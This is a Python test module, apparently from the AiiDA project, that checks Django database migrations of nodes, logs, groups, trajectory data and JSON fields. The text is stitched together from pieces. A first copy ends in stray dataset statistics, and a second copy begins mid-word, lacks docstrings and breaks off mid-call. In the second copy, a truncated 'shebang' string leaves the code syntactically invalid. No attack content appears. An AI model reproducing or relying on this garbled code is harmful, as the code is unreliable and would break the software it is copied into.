self.assertEqual(self.to_check['NoNode'][2], 2)
def test_dblog_unique_uuids(self):
"""
Verify that the UUIDs of the log records are unique
"""
DbLog = self.apps.get_model('db', 'DbLog')
l_uuids = list(_['uuid'] for _ in DbLog.objects.values('uuid'))
s_uuids = set(l_uuids)
self.assertEqual(len(l_uuids), len(s_uuids), 'The UUIDs are not all unique.')
def test_metadata_correctness(self):
"""
Verify that the metadata of the remaining records don't have an objpk and objmetadata values.
"""
import json
DbLog = self.apps.get_model('db', 'DbLog')
metadata = list(json.loads(_['metadata']) for _ in DbLog.objects.values('metadata'))
# Verify that the objpk and objname are no longer part of the metadata
for m_res in metadata:
self.assertNotIn('objpk', m_res.keys(), 'objpk should not exist any more in metadata')
self.assertNotIn('objname', m_res.keys(), 'objname should not exist any more in metadata')
class TestDbLogMigrationBackward(TestMigrations):
"""
Check that backward migrations work also for the DbLog migration(s).
"""
migrate_from = '0024_dblog_update'
migrate_to = '0023_calc_job_option_attribute_keys'
def setUpBeforeMigration(self):
import json
DbNode = self.apps.get_model('db', 'DbNode')
DbLog = self.apps.get_model('db', 'DbLog')
# Creating the needed nodes & workflows
calc_1 = DbNode(type='node.process.calculation.CalculationNode.1', user_id=self.default_user.id)
calc_2 = DbNode(type='node.process.calculation.CalculationNode.2', user_id=self.default_user.id)
# Storing them
calc_1.save()
calc_2.save()
# Creating the corresponding log records and storing them
log_1 = DbLog(
loggername='CalculationNode logger',
dbnode_id=calc_1.pk,
message='calculation node 1',
metadata=json.dumps({
'msecs': 719.0849781036377,
'lineno': 350,
'thread': 140011612940032,
'asctime': '10/21/2018 12:39:51 PM',
'created': 1540118391.719085,
'levelno': 23,
'message': 'calculation node 1',
})
)
log_2 = DbLog(
loggername='CalculationNode logger',
dbnode_id=calc_2.pk,
message='calculation node 2',
metadata=json.dumps({
'msecs': 719.0849781036377,
'lineno': 360,
'levelno': 23,
'message': 'calculation node 1',
})
)
# Storing the log records
log_1.save()
log_2.save()
# Keeping what is needed to be verified at the test
self.to_check = dict()
self.to_check[log_1.pk] = (log_1.dbnode_id, calc_1.type)
self.to_check[log_2.pk] = (log_2.dbnode_id, calc_2.type)
def test_objpk_objname(self):
"""
This test verifies that the objpk and objname have the right values
after a forward and a backward migration.
"""
import json
DbLog = self.apps.get_model('db', 'DbLog')
# Check that only two log records exist with the correct objpk objname
for log_pk, to_check_value in self.to_check.items():
log_entry = DbLog.objects.filter(pk=log_pk)[:1].get()
log_dbnode_id, node_type = to_check_value
self.assertEqual(
log_dbnode_id, log_entry.objpk,
'The dbnode_id ({}) of the 0024 schema version should be identical to the objpk ({}) of '
'the 0023 schema version.'.format(log_dbnode_id, log_entry.objpk)
)
self.assertEqual(
node_type, log_entry.objname,
'The type ({}) of the linked node of the 0024 schema version should be identical to the '
'objname ({}) of the 0023 schema version.'.format(node_type, log_entry.objname)
)
self.assertEqual(
log_dbnode_id,
json.loads(log_entry.metadata)['objpk'],
'The dbnode_id ({}) of the 0024 schema version should be identical to the objpk ({}) of '
'the 0023 schema version stored in the metadata.'.format(
log_dbnode_id,
json.loads(log_entry.metadata)['objpk']
)
)
self.assertEqual(
node_type,
json.loads(log_entry.metadata)['objname'],
'The type ({}) of the linked node of the 0024 schema version should be identical to the '
'objname ({}) of the 0023 schema version stored in the metadata.'.format(
node_type,
json.loads(log_entry.metadata)['objname']
)
)
class TestDataMoveWithinNodeMigration(TestMigrations):
"""
Check that backward migrations work also for the DbLog migration(s).
"""
migrate_from = '0024_dblog_update'
migrate_to = '0025_move_data_within_node_module'
def setUpBeforeMigration(self):
self.node_calc = self.DbNode(type='node.process.calculation.calcjob.CalcJobNode.', user_id=self.default_user.id)
self.node_data = self.DbNode(type='data.int.Int.', user_id=self.default_user.id)
self.node_calc.save()
self.node_data.save()
def test_data_type_string(self):
"""Verify that type string of the Data node was successfully adapted."""
node_calc = self.load_node(self.node_calc.id)
node_data = self.load_node(self.node_data.id)
self.assertEqual(node_data.type, 'node.data.int.Int.')
self.assertEqual(node_calc.type, 'node.process.calculation.calcjob.CalcJobNode.')
class TestTrajectoryDataMigration(TestMigrationsModelModifierV0025):
"""
This test class checks that the migrations 0026_trajectory_symbols_to_attribute and
0027_delete_trajectory_symbols_array work as expected.
These are data migrations for `TrajectoryData` nodes where symbol lists are moved
from repository array to attributes.
"""
migrate_from = '0025_move_data_within_node_module'
migrate_to = '0027_delete_trajectory_symbols_array'
stepids = numpy.array([60, 70])
times = stepids * 0.01
positions = numpy.array([[[0., 0., 0.], [0.5, 0.5, 0.5], [1.5, 1.5, 1.5]],
[[0., 0., 0.], [0.5, 0.5, 0.5], [1.5, 1.5, 1.5]]])
velocities = numpy.array([[[0., 0., 0.], [0., 0., 0.], [0., 0., 0.]],
[[0.5, 0.5, 0.5], [0.5, 0.5, 0.5], [-0.5, -0.5, -0.5]]])
cells = numpy.array([[[2., 0., 0.], [0., 2., 0.], [0., 0., 2.]], [[3., 0., 0.], [0., 3., 0.], [0., 0., 3.]]])
def setUpBeforeMigration(self):
symbols = numpy.array(['H', 'O', 'C'])
self.node = self.DbNode(type='node.data.array.trajectory.TrajectoryData.', user_id=self.default_user.id)
self.node.save()
self.set_node_array(self.node, 'steps', self.stepids)
self.set_node_array(self.node, 'cells', self.cells)
self.set_node_array(self.node, 'symbols', symbols)
self.set_node_array(self.node, 'positions', self.positions)
self.set_node_array(self.node, 'times', self.times)
self.set_node_array(self.node, 'velocities', self.velocities)
def test_trajectory_symbols(self):
""" Check that the trajectories are migrated correctly """
node = self.load_node(self.node.id)
self.assertSequenceEqual(self.get_attribute(node, 'symbols'), ['H', 'O', 'C'])
self.assertSequenceEqual(self.get_node_array(node, 'velocities').tolist(), self.velocities.tolist())
self.assertSequenceEqual(self.get_node_array(node, 'positions').tolist(), self.positions.tolist())
with self.assertRaises(IOError):
self.get_node_array(node, 'symbols')
class TestNodePrefixRemovalMigration(TestMigrations):
"""
This test class checks that the migration 0028_remove_node_prefix works as expected.
That is the final data migration for `Nodes` after `aiida.orm.nodes` reorganization
was finalized to remove the `node.` prefix
"""
migrate_from = '0027_delete_trajectory_symbols_array'
migrate_to = '0028_remove_node_prefix'
def setUpBeforeMigration(self):
self.node_calc = self.DbNode(type='node.process.calculation.calcjob.CalcJobNode.', user_id=self.default_user.id)
self.node_data = self.DbNode(type='node.data.int.Int.', user_id=self.default_user.id)
self.node_calc.save()
self.node_data.save()
def test_data_node_type_string(self):
"""Verify that type string of the nodes was successfully adapted."""
node_calc = self.load_node(self.node_calc.id)
node_data = self.load_node(self.node_data.id)
self.assertEqual(node_data.type, 'data.int.Int.')
self.assertEqual(node_calc.type, 'process.calculation.calcjob.CalcJobNode.')
class TestParameterDataToDictMigration(TestMigrations):
"""
This test class checks that the migration 0029_rename_parameter_data_to_dict works as expected.
This is a data migration for the renaming of `ParameterData` to `Dict`.
"""
migrate_from = '0028_remove_node_prefix'
migrate_to = '0029_rename_parameter_data_to_dict'
def setUpBeforeMigration(self):
self.node = self.DbNode(type='data.parameter.ParameterData.', user_id=self.default_user.id)
self.node.save()
def test_data_node_type_string(self):
"""Verify that type string of the nodes was successfully adapted."""
node = self.load_node(self.node.id)
self.assertEqual(node.type, 'data.dict.Dict.')
class TestTextFieldToJSONFieldMigration(TestMigrations): # pylint: disable=too-many-instance-attributes
"""
This test class checks that the migration 0033_replace_text_field_with_json_field works as expected.
That migration replaces the use of text fields to store JSON data with builtin JSONFields.
"""
migrate_from = '0032_remove_legacy_workflows'
migrate_to = '0033_replace_text_field_with_json_field'
def setUpBeforeMigration(self):
from aiida.common import json
self.DbNode = self.apps.get_model('db', 'DbNode')
self.DbComputer = self.apps.get_model('db', 'DbComputer')
self.DbAuthInfo = self.apps.get_model('db', 'DbAuthInfo')
self.DbLog = self.apps.get_model('db', 'DbLog')
self.node = self.DbNode(node_type='node.process.calculation.CalculationNode.', user_id=self.default_user.id)
self.node.save()
self.computer_metadata = {
'shebang': '#!/bin/bash',
'workdir': '/scratch/',
'append_text': '',
'prepend_text': '',
'mpirun_command': ['mpirun', '-np', '{tot_num_mpiprocs}'],
'default_mpiprocs_per_machine': 1
}
self.computer_kwargs = {
'name': 'localhost_testing',
'hostname': 'localhost',
'transport_type': 'local',
'scheduler_type': 'direct',
'metadata': json.dumps(self.computer_metadata),
}
self.computer = self.DbComputer(**self.computer_kwargs)
self.computer.save()
self.auth_info_auth_params = {'safe_interval': 2}
self.auth_info_metadata = {'safe_interval': 2}
self.auth_info_kwargs = {
'aiidauser_id': self.default_user.pk,
'dbcomputer': self.computer,
'auth_params': json.dumps(self.auth_info_auth_params),
'metadata': json.dumps(self.auth_info_metadata),
}
self.auth_info = self.DbAuthInfo(**self.auth_info_kwargs)
self.auth_info.save()
self.log_metadata = {
'msecs': 719.0849781036377,
'lineno': 350,
'thread': 140011612940032,
'asctime': '10/21/2018 12:39:51 PM',
'created': 1540118391.719085,
'levelno': 23,
'message': 'calculation node 1',
}
self.log_kwargs = {
'loggername': 'localhost',
'levelname': 'localhost',
'dbnode_id': self.node.id,
'metadata': json.dumps(self.log_metadata)
}
self.log = self.DbLog(**self.log_kwargs)
self.log.save()
def test_text_field_to_json_field_migration(self):
"""Verify that the values in the text fields were maintained after migrating the field to JSONField."""
# Reload the objects to make sure the new data is loaded
computer = self.DbComputer.objects.get(pk=self.computer.id)
auth_info = self.DbAuthInfo.objects.get(pk=self.auth_info.id)
log = self.DbLog.objects.get(pk=self.log.id)
# Make sure that the migrated data matches the original
self.assertDictEqual(computer.metadata, self.computer_metadata)
self.assertDictEqual(auth_info.metadata, self.auth_info_metadata)
self.assertDictEqual(auth_info.auth_params, self.auth_info_auth_params)
self.assertDictEqual(log.metadata, self.log_metadata)
class TestResetHash(TestMigrations):
"""
This test class checks that only the hash extra is removed.
"""
migrate_from = '0038_data_migration_legacy_job_calculations'
migrate_to = '0039_reset_hash'
def setUpBeforeMigration(self):
self.node = self.DbNode(
node_type='process.calculation.calcjob.CalcJobNode.',
user_id=self.default_user.id,
extras={
'something': 123,
'_aiida_hash': 'abcd'
}
)
self.node.save()
def test_data_migrated(self):
"""Verify that type string of the nodes was successfully adapted."""
node = self.load_node(self.node.id)
extras = node.extras
self.assertEqual(extras.get('something'), 123) # Other extras should be untouched
self.assertNotIn('_aiida_hash', extras) # The hash extra should have been removed
| 44.653207
| 120
| 0.655088
|
g_update(self):
DbGroup = self.apps.get_model('db', 'DbGroup')
group_user = DbGroup.objects.get(pk=self.group_user_pk)
self.assertEqual(group_user.type_string, 'user')
group_data_upf = DbGroup.objects.get(pk=self.group_data_upf_pk)
self.assertEqual(group_data_upf.type_string, 'data.upf')
group_autoimport = DbGroup.objects.get(pk=self.group_autoimport_pk)
self.assertEqual(group_autoimport.type_string, 'auto.import')
group_autorun = DbGroup.objects.get(pk=self.group_autorun_pk)
self.assertEqual(group_autorun.type_string, 'auto.run')
class TestCalcAttributeKeysMigration(TestMigrationsModelModifierV0025):
migrate_from = '0022_dbgroup_type_string_change_content'
migrate_to = '0023_calc_job_option_attribute_keys'
KEY_RESOURCES_OLD = 'jobresource_params'
KEY_RESOURCES_NEW = 'resources'
KEY_PARSER_NAME_OLD = 'parser'
KEY_PARSER_NAME_NEW = 'parser_name'
KEY_PROCESS_LABEL_OLD = '_process_label'
KEY_PROCESS_LABEL_NEW = 'process_label'
KEY_ENVIRONMENT_VARIABLES_OLD = 'custom_environment_variables'
KEY_ENVIRONMENT_VARIABLES_NEW = 'environment_variables'
def setUpBeforeMigration(self):
self.process_label = 'TestLabel'
self.resources = {'number_machines': 1}
self.environment_variables = {}
self.parser_name = 'aiida.parsers:parser'
self.node_work = self.DbNode(type='node.process.workflow.WorkflowNode.', user_id=self.default_user.id)
self.node_work.save()
self.set_attribute(self.node_work, self.KEY_PROCESS_LABEL_OLD, self.process_label)
self.node_calc = self.DbNode(type='node.process.calculation.calcjob.CalcJobNode.', user_id=self.default_user.id)
self.node_calc.save()
self.set_attribute(self.node_calc, self.KEY_PROCESS_LABEL_OLD, self.process_label)
self.set_attribute(self.node_calc, self.KEY_RESOURCES_OLD, self.resources)
self.set_attribute(self.node_calc, self.KEY_ENVIRONMENT_VARIABLES_OLD, self.environment_variables)
self.set_attribute(self.node_calc, self.KEY_PARSER_NAME_OLD, self.parser_name)
self.node_other = self.DbNode(type='node.othernode.', user_id=self.default_user.id)
self.node_other.save()
self.set_attribute(self.node_other, self.KEY_PROCESS_LABEL_OLD, self.process_label)
self.set_attribute(self.node_other, self.KEY_RESOURCES_OLD, self.resources)
self.set_attribute(self.node_other, self.KEY_ENVIRONMENT_VARIABLES_OLD, self.environment_variables)
self.set_attribute(self.node_other, self.KEY_PARSER_NAME_OLD, self.parser_name)
def test_attribute_key_changes(self):
NOT_FOUND = tuple([0])
self.assertEqual(self.get_attribute(self.node_work, self.KEY_PROCESS_LABEL_NEW), self.process_label)
self.assertEqual(self.get_attribute(self.node_work, self.KEY_PROCESS_LABEL_OLD, default=NOT_FOUND), NOT_FOUND)
self.assertEqual(self.get_attribute(self.node_calc, self.KEY_PROCESS_LABEL_NEW), self.process_label)
self.assertEqual(self.get_attribute(self.node_calc, self.KEY_RESOURCES_NEW), self.resources)
self.assertEqual(
self.get_attribute(self.node_calc, self.KEY_ENVIRONMENT_VARIABLES_NEW), self.environment_variables
)
self.assertEqual(self.get_attribute(self.node_calc, self.KEY_PARSER_NAME_NEW), self.parser_name)
self.assertEqual(self.get_attribute(self.node_calc, self.KEY_PROCESS_LABEL_OLD, default=NOT_FOUND), NOT_FOUND)
self.assertEqual(self.get_attribute(self.node_calc, self.KEY_RESOURCES_OLD, default=NOT_FOUND), NOT_FOUND)
self.assertEqual(
self.get_attribute(self.node_calc, self.KEY_ENVIRONMENT_VARIABLES_OLD, default=NOT_FOUND), NOT_FOUND
)
self.assertEqual(self.get_attribute(self.node_calc, self.KEY_PARSER_NAME_OLD, default=NOT_FOUND), NOT_FOUND)
self.assertEqual(self.get_attribute(self.node_other, self.KEY_PROCESS_LABEL_OLD), self.process_label)
self.assertEqual(self.get_attribute(self.node_other, self.KEY_RESOURCES_OLD), self.resources)
self.assertEqual(
self.get_attribute(self.node_other, self.KEY_ENVIRONMENT_VARIABLES_OLD), self.environment_variables
)
self.assertEqual(self.get_attribute(self.node_other, self.KEY_PARSER_NAME_OLD), self.parser_name)
self.assertEqual(self.get_attribute(self.node_other, self.KEY_PROCESS_LABEL_NEW, default=NOT_FOUND), NOT_FOUND)
self.assertEqual(self.get_attribute(self.node_other, self.KEY_RESOURCES_NEW, default=NOT_FOUND), NOT_FOUND)
self.assertEqual(
self.get_attribute(self.node_other, self.KEY_ENVIRONMENT_VARIABLES_NEW, default=NOT_FOUND), NOT_FOUND
)
self.assertEqual(self.get_attribute(self.node_other, self.KEY_PARSER_NAME_NEW, default=NOT_FOUND), NOT_FOUND)
class TestDbLogMigrationRecordCleaning(TestMigrations):
migrate_from = '0023_calc_job_option_attribute_keys'
migrate_to = '0024_dblog_update'
def setUpBeforeMigration(self):
import json
import importlib
from aiida.backends.general.migrations.utils import dumps_json
update_024 = importlib.import_module('aiida.backends.djsite.db.migrations.0024_dblog_update')
DbNode = self.apps.get_model('db', 'DbNode')
DbWorkflow = self.apps.get_model('db', 'DbWorkflow')
DbLog = self.apps.get_model('db', 'DbLog')
calc_1 = DbNode(type='node.process.calculation.CalculationNode.', user_id=self.default_user.id)
param = DbNode(type='data.dict.Dict.', user_id=self.default_user.id)
leg_workf = DbWorkflow(label='Legacy WorkflowNode', user_id=self.default_user.id)
calc_2 = DbNode(type='node.process.calculation.CalculationNode.', user_id=self.default_user.id)
calc_1.save()
param.save()
leg_workf.save()
calc_2.save()
log_1 = DbLog(
loggername='CalculationNode logger',
objpk=calc_1.pk,
objname='node.calculation.job.quantumespresso.pw.',
message='calculation node 1',
metadata=json.dumps({
'msecs': 719.0849781036377,
'objpk': calc_1.pk,
'lineno': 350,
'thread': 140011612940032,
'asctime': '10/21/2018 12:39:51 PM',
'created': 1540118391.719085,
'levelno': 23,
'message': 'calculation node 1',
'objname': 'node.calculation.job.quantumespresso.pw.',
})
)
log_2 = DbLog(
loggername='something.else logger',
objpk=param.pk,
objname='something.else.',
message='parameter data with log message'
)
log_3 = DbLog(
loggername='TopologicalWorkflow logger',
objpk=leg_workf.pk,
objname='aiida.workflows.user.topologicalworkflows.topo.TopologicalWorkflow',
message='parameter data with log message'
)
log_4 = DbLog(
loggername='CalculationNode logger',
objpk=calc_2.pk,
objname='node.calculation.job.quantumespresso.pw.',
message='calculation node 2',
metadata=json.dumps({
'msecs': 719.0849781036377,
'objpk': calc_2.pk,
'lineno': 360,
'levelno': 23,
'message': 'calculation node 1',
'objname': 'node.calculation.job.quantumespresso.pw.',
})
)
log_5 = DbLog(
loggername='CalculationNode logger',
objpk=(calc_2.pk + 1000),
objname='node.calculation.job.quantumespresso.pw.',
message='calculation node 1000',
metadata=json.dumps({
'msecs': 718,
'objpk': (calc_2.pk + 1000),
'lineno': 361,
'levelno': 25,
'message': 'calculation node 1000',
'objname': 'node.calculation.job.quantumespresso.pw.',
})
)
log_6 = DbLog(
loggername='CalculationNode logger',
objpk=(calc_2.pk + 1001),
objname='node.calculation.job.quantumespresso.pw.',
message='calculation node 10001',
metadata=json.dumps({
'msecs': 722,
'objpk': (calc_2.pk + 1001),
'lineno': 362,
'levelno': 24,
'message': 'calculation node 1001',
'objname': 'node.calculation.job.quantumespresso.pw.',
})
)
# Storing the log records
log_1.save()
log_2.save()
log_3.save()
log_4.save()
log_5.save()
log_6.save()
# Storing temporarily information needed for the check at the test
self.to_check = dict()
# Keeping calculation & calculation log ids
self.to_check['CalculationNode'] = (
calc_1.pk,
log_1.pk,
calc_2.pk,
log_4.pk,
)
# Getting the serialized Dict logs
param_data = DbLog.objects.filter(objpk=param.pk).filter(objname='something.else.'
).values(*update_024.values_to_export)[:1]
serialized_param_data = dumps_json(list(param_data))
# Getting the serialized logs for the unknown entity logs (as the export migration fuction
# provides them) - this should coincide to the above
serialized_unknown_exp_logs = update_024.get_serialized_unknown_entity_logs(self.schema_editor)
# Getting their number
unknown_exp_logs_number = update_024.get_unknown_entity_log_number(self.schema_editor)
self.to_check['Dict'] = (serialized_param_data, serialized_unknown_exp_logs, unknown_exp_logs_number)
# Getting the serialized legacy workflow logs
leg_wf = DbLog.objects.filter(objpk=leg_workf.pk).filter(
objname='aiida.workflows.user.topologicalworkflows.topo.TopologicalWorkflow'
).values(*update_024.values_to_export)[:1]
serialized_leg_wf_logs = dumps_json(list(leg_wf))
# Getting the serialized logs for the legacy workflow logs (as the export migration function
# provides them) - this should coincide to the above
serialized_leg_wf_exp_logs = update_024.get_serialized_legacy_workflow_logs(self.schema_editor)
eg_wf_exp_logs_number = update_024.get_legacy_workflow_log_number(self.schema_editor)
self.to_check['WorkflowNode'] = (serialized_leg_wf_logs, serialized_leg_wf_exp_logs, eg_wf_exp_logs_number)
# Getting the serialized logs that don't correspond to a DbNode record
logs_no_node = DbLog.objects.filter(id__in=[log_5.id, log_6.id]).values(*update_024.values_to_export)
serialized_logs_no_node = dumps_json(list(logs_no_node))
# provides them) - this should coincide to the above
serialized_logs_exp_no_node = update_024.get_serialized_logs_with_no_nodes(self.schema_editor)
logs_no_node_number = update_024.get_logs_with_no_nodes_number(self.schema_editor)
self.to_check['NoNode'] = (serialized_logs_no_node, serialized_logs_exp_no_node, logs_no_node_number)
def tearDown(self):
DbUser = self.apps.get_model('db', 'DbUser')
DbNode = self.apps.get_model('db', 'DbNode')
DbWorkflow = self.apps.get_model('db', 'DbWorkflow')
DbLog = self.apps.get_model('db', 'DbLog')
DbLog.objects.all().delete()
DbNode.objects.all().delete() # pylint: disable=no-member
DbWorkflow.objects.all().delete() # pylint: disable=no-member
DbUser.objects.all().delete() # pylint: disable=no-member
super().tearDown()
def test_dblog_calculation_node(self):
DbLog = self.apps.get_model('db', 'DbLog')
# Check that only two log records exist
self.assertEqual(DbLog.objects.count(), 2, 'There should be two log records left')
# Get the node id of the log record referencing the node and verify that it is the correct one
dbnode_id_1 = DbLog.objects.filter(pk=self.to_check['CalculationNode'][1]
).values('dbnode_id')[:1].get()['dbnode_id']
self.assertEqual(dbnode_id_1, self.to_check['CalculationNode'][0], 'referenced node is not the expected one')
dbnode_id_2 = DbLog.objects.filter(pk=self.to_check['CalculationNode'][3]
).values('dbnode_id')[:1].get()['dbnode_id']
self.assertEqual(dbnode_id_2, self.to_check['CalculationNode'][2], 'referenced node is not the expected one')
def test_dblog_correct_export_of_logs(self):
import json
self.assertEqual(self.to_check['Dict'][0], self.to_check['Dict'][1])
self.assertEqual(self.to_check['Dict'][2], 1)
self.assertEqual(self.to_check['WorkflowNode'][0], self.to_check['WorkflowNode'][1])
self.assertEqual(self.to_check['WorkflowNode'][2], 1)
self.assertEqual(
sorted(list(json.loads(self.to_check['NoNode'][0])), key=lambda k: k['id']),
sorted(list(json.loads(self.to_check['NoNode'][1])), key=lambda k: k['id'])
)
self.assertEqual(self.to_check['NoNode'][2], 2)
def test_dblog_unique_uuids(self):
DbLog = self.apps.get_model('db', 'DbLog')
l_uuids = list(_['uuid'] for _ in DbLog.objects.values('uuid'))
s_uuids = set(l_uuids)
self.assertEqual(len(l_uuids), len(s_uuids), 'The UUIDs are not all unique.')
def test_metadata_correctness(self):
import json
DbLog = self.apps.get_model('db', 'DbLog')
metadata = list(json.loads(_['metadata']) for _ in DbLog.objects.values('metadata'))
# Verify that the objpk and objname are no longer part of the metadata
for m_res in metadata:
self.assertNotIn('objpk', m_res.keys(), 'objpk should not exist any more in metadata')
self.assertNotIn('objname', m_res.keys(), 'objname should not exist any more in metadata')
class TestDbLogMigrationBackward(TestMigrations):
migrate_from = '0024_dblog_update'
migrate_to = '0023_calc_job_option_attribute_keys'
def setUpBeforeMigration(self):
import json
DbNode = self.apps.get_model('db', 'DbNode')
DbLog = self.apps.get_model('db', 'DbLog')
# Creating the needed nodes & workflows
calc_1 = DbNode(type='node.process.calculation.CalculationNode.1', user_id=self.default_user.id)
calc_2 = DbNode(type='node.process.calculation.CalculationNode.2', user_id=self.default_user.id)
# Storing them
calc_1.save()
calc_2.save()
# Creating the corresponding log records and storing them
log_1 = DbLog(
loggername='CalculationNode logger',
dbnode_id=calc_1.pk,
message='calculation node 1',
metadata=json.dumps({
'msecs': 719.0849781036377,
'lineno': 350,
'thread': 140011612940032,
'asctime': '10/21/2018 12:39:51 PM',
'created': 1540118391.719085,
'levelno': 23,
'message': 'calculation node 1',
})
)
log_2 = DbLog(
loggername='CalculationNode logger',
dbnode_id=calc_2.pk,
message='calculation node 2',
metadata=json.dumps({
'msecs': 719.0849781036377,
'lineno': 360,
'levelno': 23,
'message': 'calculation node 1',
})
)
# Storing the log records
log_1.save()
log_2.save()
# Keeping what is needed to be verified at the test
self.to_check = dict()
self.to_check[log_1.pk] = (log_1.dbnode_id, calc_1.type)
self.to_check[log_2.pk] = (log_2.dbnode_id, calc_2.type)
def test_objpk_objname(self):
import json
DbLog = self.apps.get_model('db', 'DbLog')
# Check that only two log records exist with the correct objpk objname
for log_pk, to_check_value in self.to_check.items():
log_entry = DbLog.objects.filter(pk=log_pk)[:1].get()
log_dbnode_id, node_type = to_check_value
self.assertEqual(
log_dbnode_id, log_entry.objpk,
'The dbnode_id ({}) of the 0024 schema version should be identical to the objpk ({}) of '
'the 0023 schema version.'.format(log_dbnode_id, log_entry.objpk)
)
self.assertEqual(
node_type, log_entry.objname,
'The type ({}) of the linked node of the 0024 schema version should be identical to the '
'objname ({}) of the 0023 schema version.'.format(node_type, log_entry.objname)
)
self.assertEqual(
log_dbnode_id,
json.loads(log_entry.metadata)['objpk'],
'The dbnode_id ({}) of the 0024 schema version should be identical to the objpk ({}) of '
'the 0023 schema version stored in the metadata.'.format(
log_dbnode_id,
json.loads(log_entry.metadata)['objpk']
)
)
self.assertEqual(
node_type,
json.loads(log_entry.metadata)['objname'],
'The type ({}) of the linked node of the 0024 schema version should be identical to the '
'objname ({}) of the 0023 schema version stored in the metadata.'.format(
node_type,
json.loads(log_entry.metadata)['objname']
)
)
class TestDataMoveWithinNodeMigration(TestMigrations):
migrate_from = '0024_dblog_update'
migrate_to = '0025_move_data_within_node_module'
def setUpBeforeMigration(self):
self.node_calc = self.DbNode(type='node.process.calculation.calcjob.CalcJobNode.', user_id=self.default_user.id)
self.node_data = self.DbNode(type='data.int.Int.', user_id=self.default_user.id)
self.node_calc.save()
self.node_data.save()
def test_data_type_string(self):
node_calc = self.load_node(self.node_calc.id)
node_data = self.load_node(self.node_data.id)
self.assertEqual(node_data.type, 'node.data.int.Int.')
self.assertEqual(node_calc.type, 'node.process.calculation.calcjob.CalcJobNode.')
class TestTrajectoryDataMigration(TestMigrationsModelModifierV0025):
migrate_from = '0025_move_data_within_node_module'
migrate_to = '0027_delete_trajectory_symbols_array'
stepids = numpy.array([60, 70])
times = stepids * 0.01
positions = numpy.array([[[0., 0., 0.], [0.5, 0.5, 0.5], [1.5, 1.5, 1.5]],
[[0., 0., 0.], [0.5, 0.5, 0.5], [1.5, 1.5, 1.5]]])
velocities = numpy.array([[[0., 0., 0.], [0., 0., 0.], [0., 0., 0.]],
[[0.5, 0.5, 0.5], [0.5, 0.5, 0.5], [-0.5, -0.5, -0.5]]])
cells = numpy.array([[[2., 0., 0.], [0., 2., 0.], [0., 0., 2.]], [[3., 0., 0.], [0., 3., 0.], [0., 0., 3.]]])
def setUpBeforeMigration(self):
symbols = numpy.array(['H', 'O', 'C'])
self.node = self.DbNode(type='node.data.array.trajectory.TrajectoryData.', user_id=self.default_user.id)
self.node.save()
self.set_node_array(self.node, 'steps', self.stepids)
self.set_node_array(self.node, 'cells', self.cells)
self.set_node_array(self.node, 'symbols', symbols)
self.set_node_array(self.node, 'positions', self.positions)
self.set_node_array(self.node, 'times', self.times)
self.set_node_array(self.node, 'velocities', self.velocities)
def test_trajectory_symbols(self):
node = self.load_node(self.node.id)
self.assertSequenceEqual(self.get_attribute(node, 'symbols'), ['H', 'O', 'C'])
self.assertSequenceEqual(self.get_node_array(node, 'velocities').tolist(), self.velocities.tolist())
self.assertSequenceEqual(self.get_node_array(node, 'positions').tolist(), self.positions.tolist())
with self.assertRaises(IOError):
self.get_node_array(node, 'symbols')
class TestNodePrefixRemovalMigration(TestMigrations):
migrate_from = '0027_delete_trajectory_symbols_array'
migrate_to = '0028_remove_node_prefix'
def setUpBeforeMigration(self):
self.node_calc = self.DbNode(type='node.process.calculation.calcjob.CalcJobNode.', user_id=self.default_user.id)
self.node_data = self.DbNode(type='node.data.int.Int.', user_id=self.default_user.id)
self.node_calc.save()
self.node_data.save()
def test_data_node_type_string(self):
node_calc = self.load_node(self.node_calc.id)
node_data = self.load_node(self.node_data.id)
self.assertEqual(node_data.type, 'data.int.Int.')
self.assertEqual(node_calc.type, 'process.calculation.calcjob.CalcJobNode.')
class TestParameterDataToDictMigration(TestMigrations):
migrate_from = '0028_remove_node_prefix'
migrate_to = '0029_rename_parameter_data_to_dict'
def setUpBeforeMigration(self):
self.node = self.DbNode(type='data.parameter.ParameterData.', user_id=self.default_user.id)
self.node.save()
def test_data_node_type_string(self):
node = self.load_node(self.node.id)
self.assertEqual(node.type, 'data.dict.Dict.')
class TestTextFieldToJSONFieldMigration(TestMigrations): # pylint: disable=too-many-instance-attributes
migrate_from = '0032_remove_legacy_workflows'
migrate_to = '0033_replace_text_field_with_json_field'
def setUpBeforeMigration(self):
from aiida.common import json
self.DbNode = self.apps.get_model('db', 'DbNode')
self.DbComputer = self.apps.get_model('db', 'DbComputer')
self.DbAuthInfo = self.apps.get_model('db', 'DbAuthInfo')
self.DbLog = self.apps.get_model('db', 'DbLog')
self.node = self.DbNode(node_type='node.process.calculation.CalculationNode.', user_id=self.default_user.id)
self.node.save()
self.computer_metadata = {
'shebang': '
'workdir': '/scratch/',
'append_text': '',
'prepend_text': '',
'mpirun_command': ['mpirun', '-np', '{tot_num_mpiprocs}'],
'default_mpiprocs_per_machine': 1
}
self.computer_kwargs = {
'name': 'localhost_testing',
'hostname': 'localhost',
'transport_type': 'local',
'scheduler_type': 'direct',
'metadata': json.dumps(self.computer_metadata),
}
self.computer = self.DbComputer(**self.computer_kwargs)
self.computer.save()
self.auth_info_auth_params = {'safe_interval': 2}
self.auth_info_metadata = {'safe_interval': 2}
self.auth_info_kwargs = {
'aiidauser_id': self.default_user.pk,
'dbcomputer': self.computer,
'auth_params': json.dumps(self.auth_info_auth_params),
'metadata': json.dumps(self.auth_info_metadata),
}
self.auth_info = self.DbAuthInfo(**self.auth_info_kwargs)
self.auth_info.save()
self.log_metadata = {
'msecs': 719.0849781036377,
'lineno': 350,
'thread': 140011612940032,
'asctime': '10/21/2018 12:39:51 PM',
'created': 1540118391.719085,
'levelno': 23,
'message': 'calculation node 1',
}
self.log_kwargs = {
'loggername': 'localhost',
'levelname': 'localhost',
'dbnode_id': self.node.id,
'metadata': json.dumps(self.log_metadata)
}
self.log = self.DbLog(**self.log_kwargs)
self.log.save()
def test_text_field_to_json_field_migration(self):
# Reload the objects to make sure the new data is loaded
computer = self.DbComputer.objects.get(pk=self.computer.id)
auth_info = self.DbAuthInfo.objects.get(pk=self.auth_info.id)
log = self.DbLog.objects.get(pk=self.log.id)
# Make sure that the migrated data matches the original
self.assertDictEqual(computer.metadata, self.computer_metadata)
self.assertDictEqual(auth_info.metadata, self.auth_info_metadata)
self.assertDictEqual(auth_info.auth_params, self.auth_info_auth_params)
self.assertDictEqual(log.metadata, self.log_metadata)
class TestResetHash(TestMigrations):
migrate_from = '0038_data_migration_legacy_job_calculations'
migrate_to = '0039_reset_hash'
def setUpBeforeMigration(self):
self.node = self.DbNode(
